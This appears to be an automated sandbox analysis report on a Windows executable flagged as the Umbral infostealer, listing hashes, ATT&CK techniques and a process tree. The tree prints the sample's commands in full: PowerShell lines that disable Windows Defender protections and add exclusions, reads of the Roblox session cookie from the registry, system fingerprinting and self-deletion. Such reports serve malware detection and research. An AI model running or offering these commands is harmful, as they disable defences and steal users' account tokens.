Analysis
-
max time kernel
15s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
02-08-2024 15:23
Behavioral task
behavioral1
Sample
Kioscene Softdrive v2.10.exe
Resource
win7-20240704-en
General
-
Target
Kioscene Softdrive v2.10.exe
-
Size
229KB
-
MD5
18dff45f8e9eb29b0fb13e341bdd8dfc
-
SHA1
768114e6ed8a6dab7eec0e677d53430c37e5393e
-
SHA256
dfaadfbf1693ea477fde1a960b20280daa82e35128f537a62859bc5aeff9a948
-
SHA512
ace88964c82470394bd18f6b1ca16fecdf3394b0900f0b375dc358bd8577828e7041c35d9bb790b9d91b062df9167963221f6c7ab62740c6f5ae1e9861c5f223
-
SSDEEP
6144:lloZM+rIkd8g+EtXHkv/iD44lU3HdmOhOU9va6v1Nb8e1mpi:noZtL+EP84lU3HdmOhOU9va6vXj
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1600-1-0x0000000001270000-0x00000000012B0000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2764 powershell.exe 2016 powershell.exe 2928 powershell.exe 2792 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Kioscene Softdrive v2.10.exe -
Deletes itself 1 IoCs
pid Process 2404 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2404 cmd.exe 2644 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2992 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2644 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1600 Kioscene Softdrive v2.10.exe 2764 powershell.exe 2016 powershell.exe 2928 powershell.exe 1576 powershell.exe 2792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1600 Kioscene Softdrive v2.10.exe Token: SeIncreaseQuotaPrivilege 2116 wmic.exe Token: SeSecurityPrivilege 2116 wmic.exe Token: SeTakeOwnershipPrivilege 2116 wmic.exe Token: SeLoadDriverPrivilege 2116 wmic.exe Token: SeSystemProfilePrivilege 2116 wmic.exe Token: SeSystemtimePrivilege 2116 wmic.exe Token: SeProfSingleProcessPrivilege 2116 wmic.exe Token: SeIncBasePriorityPrivilege 2116 wmic.exe Token: SeCreatePagefilePrivilege 2116 wmic.exe Token: SeBackupPrivilege 2116 wmic.exe Token: SeRestorePrivilege 2116 wmic.exe Token: SeShutdownPrivilege 2116 wmic.exe Token: SeDebugPrivilege 2116 wmic.exe Token: SeSystemEnvironmentPrivilege 2116 wmic.exe Token: SeRemoteShutdownPrivilege 2116 wmic.exe Token: SeUndockPrivilege 2116 wmic.exe Token: SeManageVolumePrivilege 2116 wmic.exe Token: 33 2116 wmic.exe Token: 34 2116 wmic.exe Token: 35 2116 wmic.exe Token: SeIncreaseQuotaPrivilege 2116 wmic.exe Token: SeSecurityPrivilege 2116 wmic.exe Token: SeTakeOwnershipPrivilege 2116 wmic.exe Token: SeLoadDriverPrivilege 2116 wmic.exe Token: SeSystemProfilePrivilege 2116 wmic.exe Token: SeSystemtimePrivilege 2116 wmic.exe Token: SeProfSingleProcessPrivilege 2116 wmic.exe Token: SeIncBasePriorityPrivilege 2116 wmic.exe Token: SeCreatePagefilePrivilege 2116 wmic.exe Token: SeBackupPrivilege 2116 wmic.exe Token: SeRestorePrivilege 2116 wmic.exe Token: SeShutdownPrivilege 2116 wmic.exe Token: SeDebugPrivilege 2116 wmic.exe Token: SeSystemEnvironmentPrivilege 2116 wmic.exe Token: SeRemoteShutdownPrivilege 2116 wmic.exe Token: SeUndockPrivilege 2116 wmic.exe Token: SeManageVolumePrivilege 2116 wmic.exe Token: 33 2116 wmic.exe Token: 34 2116 wmic.exe Token: 35 2116 wmic.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeIncreaseQuotaPrivilege 2028 wmic.exe Token: SeSecurityPrivilege 2028 wmic.exe Token: SeTakeOwnershipPrivilege 2028 wmic.exe Token: SeLoadDriverPrivilege 2028 wmic.exe Token: SeSystemProfilePrivilege 2028 wmic.exe Token: SeSystemtimePrivilege 2028 wmic.exe Token: SeProfSingleProcessPrivilege 2028 wmic.exe Token: SeIncBasePriorityPrivilege 2028 wmic.exe Token: SeCreatePagefilePrivilege 2028 wmic.exe Token: SeBackupPrivilege 2028 wmic.exe Token: SeRestorePrivilege 2028 wmic.exe Token: SeShutdownPrivilege 2028 wmic.exe Token: SeDebugPrivilege 2028 wmic.exe Token: SeSystemEnvironmentPrivilege 2028 wmic.exe Token: SeRemoteShutdownPrivilege 2028 wmic.exe Token: SeUndockPrivilege 2028 wmic.exe Token: SeManageVolumePrivilege 2028 wmic.exe Token: 33 2028 wmic.exe Token: 34 2028 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1600 wrote to memory of 2116 1600 Kioscene Softdrive v2.10.exe 31 PID 1600 wrote to memory of 2116 1600 Kioscene Softdrive v2.10.exe 31 PID 1600 wrote to memory of 2116 1600 Kioscene Softdrive v2.10.exe 31 PID 1600 wrote to memory of 2184 1600 Kioscene Softdrive v2.10.exe 34 PID 1600 wrote to memory of 2184 1600 Kioscene Softdrive v2.10.exe 34 PID 1600 wrote to memory of 2184 1600 Kioscene Softdrive v2.10.exe 34 PID 1600 wrote to memory of 2764 1600 Kioscene Softdrive v2.10.exe 36 PID 1600 wrote to memory of 2764 1600 Kioscene Softdrive v2.10.exe 36 PID 1600 wrote to memory of 2764 1600 Kioscene Softdrive v2.10.exe 36 PID 1600 wrote to memory of 2016 1600 Kioscene Softdrive v2.10.exe 38 PID 1600 wrote to memory of 2016 1600 Kioscene Softdrive v2.10.exe 38 PID 1600 wrote to memory of 2016 1600 Kioscene Softdrive v2.10.exe 38 PID 1600 wrote to memory of 2928 1600 Kioscene Softdrive v2.10.exe 40 PID 1600 wrote to memory of 2928 1600 Kioscene Softdrive v2.10.exe 40 PID 1600 wrote to memory of 2928 1600 Kioscene Softdrive v2.10.exe 40 PID 1600 wrote to memory of 1576 1600 Kioscene Softdrive v2.10.exe 42 PID 1600 wrote to memory of 1576 1600 Kioscene Softdrive v2.10.exe 42 PID 1600 wrote to memory of 1576 1600 Kioscene Softdrive v2.10.exe 42 PID 1600 wrote to memory of 2028 1600 Kioscene Softdrive v2.10.exe 44 PID 1600 wrote to memory of 2028 1600 Kioscene Softdrive v2.10.exe 44 PID 1600 wrote to memory of 2028 1600 Kioscene Softdrive v2.10.exe 44 PID 1600 wrote to memory of 844 1600 Kioscene Softdrive v2.10.exe 46 PID 1600 wrote to memory of 844 1600 Kioscene Softdrive v2.10.exe 46 PID 1600 wrote to memory of 844 1600 Kioscene Softdrive v2.10.exe 46 PID 1600 wrote to memory of 1164 1600 Kioscene Softdrive v2.10.exe 48 PID 1600 wrote to memory of 1164 1600 Kioscene Softdrive v2.10.exe 48 PID 1600 wrote to memory of 1164 1600 Kioscene Softdrive v2.10.exe 48 PID 1600 wrote to memory of 2792 1600 Kioscene Softdrive v2.10.exe 50 PID 1600 wrote to memory of 2792 1600 Kioscene Softdrive v2.10.exe 50 PID 1600 wrote to memory of 2792 1600 Kioscene Softdrive v2.10.exe 50 PID 1600 wrote to memory of 2992 1600 Kioscene Softdrive v2.10.exe 52 PID 1600 wrote to memory of 2992 1600 Kioscene Softdrive v2.10.exe 52 PID 1600 wrote to memory of 2992 1600 Kioscene Softdrive v2.10.exe 52 PID 1600 wrote to memory of 2404 1600 Kioscene Softdrive v2.10.exe 54 PID 1600 wrote to memory of 2404 1600 Kioscene Softdrive v2.10.exe 54 PID 1600 wrote to memory of 2404 1600 Kioscene Softdrive v2.10.exe 54 PID 2404 wrote to memory of 2644 2404 cmd.exe 56 PID 2404 wrote to memory of 2644 2404 cmd.exe 56 PID 2404 wrote to memory of 2644 2404 cmd.exe 56 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2184 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe"C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe"2⤵
- Views/modifies file attributes
PID:2184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:844
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2792
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2992
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2644
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c590bf616d5a1e677aa34fb6625416b6
SHA1eac9681600e9e0d15014e13416a71bb7ae466dc7
SHA25605c903c50d4ebd9befd840d3e8bc360e31ecd0dc86d317be3cf04b1fa95cd440
SHA512be505e14c06b16e6b2b831a0f2eee076644b39dbef6e73fe9e570f262af6397678746f6aaf32b44b1ff3035587946539a7efbca196b141ad14da82876a385e16